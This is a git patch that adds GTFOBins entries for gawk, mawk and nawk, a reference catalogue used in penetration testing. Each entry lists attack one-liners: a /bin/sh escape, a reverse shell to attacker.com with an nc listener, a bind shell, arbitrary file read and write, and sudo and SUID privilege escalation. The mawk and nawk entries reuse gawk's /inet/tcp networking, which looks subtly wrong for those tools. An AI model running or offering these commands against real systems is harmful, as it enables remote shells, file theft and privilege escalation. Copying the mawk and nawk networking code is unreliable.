From 977232c45c7679e27d5564ca3a88bf4916e75463 Mon Sep 17 00:00:00 2001 From: AlessandroZ Date: Fri, 30 Aug 2019 15:10:25 +0200 Subject: [PATCH] adding gawk, nawk, mawk --- _gtfobins/gawk.md | 34 ++++++++++++++++++++++++++++++++++ _gtfobins/mawk.md | 34 ++++++++++++++++++++++++++++++++++ _gtfobins/nawk.md | 34 ++++++++++++++++++++++++++++++++++ 3 files changed, 102 insertions(+) create mode 100644 _gtfobins/gawk.md create mode 100644 _gtfobins/mawk.md create mode 100644 _gtfobins/nawk.md diff --git a/_gtfobins/gawk.md b/_gtfobins/gawk.md new file mode 100644 index 0000000..bf63ca8 --- /dev/null +++ b/_gtfobins/gawk.md @@ -0,0 +1,34 @@ +--- +functions: + shell: + - code: gawk 'BEGIN {system("/bin/sh")}' + non-interactive-reverse-shell: + - description: Run `nc -l -p 12345` on the attacker box to receive the shell. + code: | + RHOST=attacker.com + RPORT=12345 + gawk -v RHOST=$RHOST -v RPORT=$RPORT 'BEGIN { + s = "/inet/tcp/0/" RHOST "/" RPORT; + while (1) {printf "> " |& s; if ((s |& getline c) <= 0) break; + while (c && (c |& getline) > 0) print $0 |& s; close(c)}}' + non-interactive-bind-shell: + - description: Run `nc target.com 12345` on the attacker box to connect to the shell. + code: | + LPORT=12345 + gawk -v LPORT=$LPORT 'BEGIN { + s = "/inet/tcp/" LPORT "/0/0"; + while (1) {printf "> " |& s; if ((s |& getline c) <= 0) break; + while (c && (c |& getline) > 0) print $0 |& s; close(c)}}' + file-write: + - code: | + LFILE=file_to_write + gawk -v LFILE=$LFILE 'BEGIN { print "DATA" > LFILE }' + file-read: + - code: | + LFILE=file_to_read + gawk '//' "$LFILE" + sudo: + - code: sudo gawk 'BEGIN {system("/bin/sh")}' + limited-suid: + - code: ./gawk 'BEGIN {system("/bin/sh")}' +--- diff --git a/_gtfobins/mawk.md b/_gtfobins/mawk.md new file mode 100644 index 0000000..6281baf --- /dev/null +++ b/_gtfobins/mawk.md @@ -0,0 +1,34 @@ +--- +functions: + shell: + - code: mawk 'BEGIN {system("/bin/sh")}' + non-interactive-reverse-shell: + - description: Run `nc -l -p 12345` on the attacker box to receive the shell. + code: | + RHOST=attacker.com + RPORT=12345 + mawk -v RHOST=$RHOST -v RPORT=$RPORT 'BEGIN { + s = "/inet/tcp/0/" RHOST "/" RPORT; + while (1) {printf "> " |& s; if ((s |& getline c) <= 0) break; + while (c && (c |& getline) > 0) print $0 |& s; close(c)}}' + non-interactive-bind-shell: + - description: Run `nc target.com 12345` on the attacker box to connect to the shell. + code: | + LPORT=12345 + mawk -v LPORT=$LPORT 'BEGIN { + s = "/inet/tcp/" LPORT "/0/0"; + while (1) {printf "> " |& s; if ((s |& getline c) <= 0) break; + while (c && (c |& getline) > 0) print $0 |& s; close(c)}}' + file-write: + - code: | + LFILE=file_to_write + mawk -v LFILE=$LFILE 'BEGIN { print "DATA" > LFILE }' + file-read: + - code: | + LFILE=file_to_read + mawk '//' "$LFILE" + sudo: + - code: sudo mawk 'BEGIN {system("/bin/sh")}' + limited-suid: + - code: ./mawk 'BEGIN {system("/bin/sh")}' +--- diff --git a/_gtfobins/nawk.md b/_gtfobins/nawk.md new file mode 100644 index 0000000..9dc77fa --- /dev/null +++ b/_gtfobins/nawk.md @@ -0,0 +1,34 @@ +--- +functions: + shell: + - code: nawk 'BEGIN {system("/bin/sh")}' + non-interactive-reverse-shell: + - description: Run `nc -l -p 12345` on the attacker box to receive the shell. + code: | + RHOST=attacker.com + RPORT=12345 + nawk -v RHOST=$RHOST -v RPORT=$RPORT 'BEGIN { + s = "/inet/tcp/0/" RHOST "/" RPORT; + while (1) {printf "> " |& s; if ((s |& getline c) <= 0) break; + while (c && (c |& getline) > 0) print $0 |& s; close(c)}}' + non-interactive-bind-shell: + - description: Run `nc target.com 12345` on the attacker box to connect to the shell. + code: | + LPORT=12345 + nawk -v LPORT=$LPORT 'BEGIN { + s = "/inet/tcp/" LPORT "/0/0"; + while (1) {printf "> " |& s; if ((s |& getline c) <= 0) break; + while (c && (c |& getline) > 0) print $0 |& s; close(c)}}' + file-write: + - code: | + LFILE=file_to_write + nawk -v LFILE=$LFILE 'BEGIN { print "DATA" > LFILE }' + file-read: + - code: | + LFILE=file_to_read + nawk '//' "$LFILE" + sudo: + - code: sudo nawk 'BEGIN {system("/bin/sh")}' + limited-suid: + - code: ./nawk 'BEGIN {system("/bin/sh")}' +---